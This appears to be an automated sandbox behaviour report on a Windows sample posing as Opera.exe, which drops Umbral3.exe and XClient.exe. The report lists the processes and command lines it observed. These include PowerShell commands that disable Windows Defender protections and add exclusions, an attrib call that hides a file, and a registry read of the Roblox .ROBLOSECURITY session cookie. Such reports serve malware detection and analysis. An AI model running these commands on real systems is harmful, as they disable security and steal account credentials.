Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\Opera.exe:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1116 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\Opera.exe C:\Users\Admin\AppData\Local\Temp\Umbral3.exe
PID 1116 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\Opera.exe C:\Users\Admin\AppData\Local\Temp\Umbral3.exe
PID 1116 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\Opera.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 1116 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\Opera.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 208 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\SYSTEM32\attrib.exe
PID 208 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\SYSTEM32\attrib.exe
PID 208 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 208 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 208 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 208 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 208 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 208 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 208 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 208 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3172 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3172 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 208 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\Wbem\wmic.exe
PID 208 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\Wbem\wmic.exe
PID 208 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\Wbem\wmic.exe
PID 208 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\Wbem\wmic.exe
PID 3172 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3172 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1880 wrote to memory of 4404 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 208 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\Wbem\wmic.exe
PID 208 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\Umbral3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4404 wrote to memory of 2268 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 2268 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4404 wrote to memory of 3648 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Opera.exe

"C:\Users\Admin\AppData\Local\Temp\Opera.exe"

C:\Users\Admin\AppData\Local\Temp\Umbral3.exe

"C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.0.785884306\520282606" -parentBuildID 20221007134813 -prefsHandle 1636 -prefMapHandle 1624 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2b27ca1-1d07-4130-9b46-2d90e87c56e6} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 1720 1f2931f4d58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.1.114254307\1143745263" -parentBuildID 20221007134813 -prefsHandle 2096 -prefMapHandle 2092 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97135303-6f31-474e-b0de-7fc9643e4482} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 2108 1f292b41958 socket

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.2.135195726\1258005419" -childID 1 -isForBrowser -prefsHandle 2760 -prefMapHandle 2968 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf445491-c395-438b-a880-e3f76ce4fac5} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 2944 1f297197558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.3.693188196\2020291680" -childID 2 -isForBrowser -prefsHandle 3424 -prefMapHandle 3408 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca22dd52-3dad-478c-90d1-935503a1fdcf} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 3452 1f287e61f58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.4.2076861460\1814433807" -childID 3 -isForBrowser -prefsHandle 4304 -prefMapHandle 4296 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1d24509-16a4-4d4a-bc21-c7a99d73984d} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4320 1f29921e358 tab

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Client.exe'

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.5.784412914\1526721620" -childID 4 -isForBrowser -prefsHandle 4848 -prefMapHandle 4844 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc938f41-17fd-4a76-8870-7f37287291f8} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4800 1f287e62258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.6.141288439\352932363" -childID 5 -isForBrowser -prefsHandle 4928 -prefMapHandle 4932 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {76de6abc-bcb3-4468-ba5a-dcc2db041487} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4884 1f299496758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.7.319893757\1180504177" -childID 6 -isForBrowser -prefsHandle 5096 -prefMapHandle 5100 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c5b81f3-2add-45a9-8206-3932dd707e78} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4912 1f299496a58 tab

